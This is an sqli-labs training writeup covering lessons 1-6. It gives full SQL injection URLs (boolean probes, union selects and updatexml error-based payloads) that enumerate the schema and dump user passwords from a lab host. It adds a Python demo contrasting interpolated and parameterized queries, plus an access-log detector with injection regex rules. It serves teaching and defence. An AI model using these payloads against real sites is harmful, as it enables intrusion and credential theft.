sqli-labs lessons 1-6

Injection steps
Identify the injection point
Test with AND, OR and XOR (and / or / xor).
Usually and is used; taking lesson 1 as an example:
http://172.16.54.161/sqli/Less-1/?id=1' and '1'='1 returns normally
http://172.16.54.161/sqli/Less-1/?id=1' and '1'='2 returns an error
This confirms an injection point exists.
Determine the number of columns
Use an order by clause to test:
http://172.16.54.161/sqli/Less-1/?id=1' order by 4 --+ returns an error
http://172.16.54.161/sqli/Less-1/?id=1' order by 3 --+ returns normally
So the column count is 3.
Query the database name
user() returns the database user; check whether it is root
version() returns the database version; check whether it is 5.0 or above
database() returns the current database name
@@version_compile_os returns the operating system the database runs on

Union query for the database user, version, database name and operating system
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,2,3 --+
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,user(),3 --+
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,version(),3 --+
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,database(),3 --+
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,@@version_compile_os,3 --+

Query the table names
group_concat() joins every result in a group into a single string
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema='security'--+
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

Query the column names
Querying without a filter returns column names from every database, so restrict it by database name as well
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+

Query the field values
Use limit or group_concat() to retrieve the individual values
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,username,password from users--+
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,username,password from users limit 1,1--+
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,username,password from users limit 2,1--+
http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,group_concat(username,0x7e,password),3 from users--+

With echoed output
Lesson 1: http://172.16.54.161/sqli/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

Lesson 2: http://172.16.54.161/sqli/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

Lesson 3: http://172.16.54.161/sqli/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

Lesson 4: http://172.16.54.161/sqli/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+

The four lessons above differ mainly in the closing characters; when the page gives nothing useful, you can also read the SQL statement in the PHP source or view the page source directly.
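The whole procedure above works only because the id parameter is spliced into SQL text, and the lesson-to-lesson differences are just which closing characters (', nothing, or ')) the splice sits inside. As an added example, not code from the original writeup or from sqli-labs, the following Python script models the interpolation behind lessons 1-3 against an in-memory SQLite table of constructed rows, runs the page's probes through both the string-built query and a parameterized one, and shows that the bound parameter turns every probe into a harmless literal. The usernames and passwords, the query templates and the names vulnerable_lookup/safe_lookup/decode_id are assumptions; SQLite stands in for MySQL, and the double-quoted forms of lessons 4 and 6 are left out because SQLite does not reliably accept double quotes as string delimiters.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample rows standing in for the lab's security.users table.
SAMPLE_USERS = [
    (1, "alice", "alice-pass"),
    (2, "bob", "bob-pass"),
    (3, "carol", "carol-pass"),
]

# Assumed shape of how lessons 1-3 splice the id parameter into SQL text.
# Lessons 4 and 6 use double quotes, which SQLite does not reliably accept as
# string delimiters, so they are omitted here.
VULNERABLE_TEMPLATES = {
    "Less-1": "SELECT id,username,password FROM users WHERE id='{id}' LIMIT 0,1",
    "Less-2": "SELECT id,username,password FROM users WHERE id={id} LIMIT 0,1",
    "Less-3": "SELECT id,username,password FROM users WHERE id=('{id}') LIMIT 0,1",
}


def fresh_db():
    """Return an in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)", SAMPLE_USERS)
    return conn


def decode_id(query_value):
    """URL-decode the raw ?id= value the way the web server does. '+' becomes a
    space, which is why the page's '--+' reaches the database as the valid
    comment marker '-- '."""
    return unquote_plus(query_value)


def vulnerable_lookup(lesson, query_value):
    """String interpolation, as the lab's PHP does. Returns the rows the page
    would echo, or a single ('error', message) row when the database rejects
    the statement (the signal the 'order by' step relies on)."""
    conn = fresh_db()
    sql = VULNERABLE_TEMPLATES[lesson].format(id=decode_id(query_value))
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return [("error", str(exc))]
    finally:
        conn.close()


def safe_lookup(query_value):
    """Hardened form: the id is bound as a parameter, so it can only ever be
    compared as a value and none of the probes change the statement."""
    conn = fresh_db()
    try:
        return conn.execute(
            "SELECT id,username,password FROM users WHERE id=? LIMIT 1",
            (decode_id(query_value),),
        ).fetchall()
    finally:
        conn.close()


if __name__ == "__main__":
    for probe in ("1'+and+'1'='1", "1'+and+'1'='2", "1'+order+by+4+--+",
                  "-1'+union+select+1,username,password+from+users+--+"):
        print(repr(decode_id(probe)))
        print("  vulnerable:", vulnerable_lookup("Less-1", probe))
        print("  safe      :", safe_lookup(probe))
```

Running it reproduces the writeup's observations on the vulnerable path (the true probe returns the row, the false probe returns nothing, order by 4 errors while order by 3 does not, and the union probe returns every row) while safe_lookup returns an empty result for each probe and only finds a row for a plain numeric id.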
Without echoed output

Lesson 5:
Identify the injection point: http://172.16.54.161/sqli/Less-5/?id=1' and '1'='1 returns normally
http://172.16.54.161/sqli/Less-5/?id=1' and '1'='2 returns an error
Determine the column count: http://172.16.54.161/sqli/Less-5/?id=1' order by 4--+ returns an error
http://172.16.54.161/sqli/Less-5/?id=1' order by 3--+ returns normally
Query the database name: the union query used earlier returns nothing in the page, so switch to error-based injection
http://172.16.54.161/sqli/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

Query the table names: http://172.16.54.161/sqli/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

Query the column names: http://172.16.54.161/sqli/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e),1)--+

Query the field values: http://172.16.54.161/sqli/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1)--+

Lesson 6: http://172.16.54.161/sqli/Less-6/?id=-1" and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1)--+

Don't forget the concat() function; lessons 5 and 6 likewise differ only in the closing characters.
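Every step in this writeup, the boolean probes, the order by count, the union and information_schema queries and the updatexml error-based variant, travels in the ?id= query string, so each leaves a recognisable trace in the web server's access log once the value is URL-decoded. As an added example that is not part of the original writeup, the Python script below parses a constructed Apache-style log excerpt, decodes every parameter and tags each request with the step it resembles. The log lines, client addresses, timestamps, rule names and the function names scan_log/classify/decoded_params are all assumptions; the request values are the page's own probes in their encoded form.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access log excerpt. The requests mirror the page's
# probes; the addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 1043
10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /sqli/Less-1/?id=1%27%20and%20%271%27=%272 HTTP/1.1" 200 812
10.0.0.5 - - [10/Oct/2023:13:56:02 +0000] "GET /sqli/Less-1/?id=1%27+order+by+4+--+ HTTP/1.1" 200 901
10.0.0.5 - - [10/Oct/2023:13:56:30 +0000] "GET /sqli/Less-1/?id=-1%27+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=%27security%27--+ HTTP/1.1" 200 1210
10.0.0.5 - - [10/Oct/2023:13:57:10 +0000] "GET /sqli/Less-5/?id=-1%27+and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)--+ HTTP/1.1" 200 760
10.0.0.9 - - [10/Oct/2023:13:58:00 +0000] "GET /search?q=order+by+date HTTP/1.1" 200 2200
"""

# One pattern per step of the writeup, applied to the URL-decoded value.
# The digit requirement on 'order by' keeps ordinary search text such as
# "order by date" from matching.
RULES = {
    "boolean_probe": re.compile(r"'\s*(?:and|or|xor)\b", re.I),
    "column_count_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "error_based": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    "comment_tail": re.compile(r"--\s"),
}

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')


def decoded_params(target):
    """Split the request target into URL-decoded (name, value) pairs; this is
    the step that turns %27 back into a quote and '--+' into '-- '."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def classify(value):
    """Return the sorted names of every rule the decoded value triggers."""
    return sorted(name for name, rx in RULES.items() if rx.search(value))


def scan_log(text):
    """Return (line number, client address, rule names) for every request whose
    parameters resemble one of the writeup's injection steps."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        matched = set()
        for _name, value in decoded_params(target):
            matched.update(classify(value))
        if matched:
            hits.append((lineno, client, sorted(matched)))
    return hits


if __name__ == "__main__":
    for lineno, client, rules in scan_log(SAMPLE_LOG):
        print(f"line {lineno} from {client}: {', '.join(rules)}")
```

Decoding before matching is the important detail: in the raw log the quote is %27 and the comment marker is --+, so a pattern applied to the undecoded line misses both. The patterns cover only the plain forms used on this page, so treat the script as the starting point for an alert rather than a complete signature set; the fix that removes the class of bug is still the parameterized query, and the access-log check is how you notice the attempts against code that has not been fixed yet.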
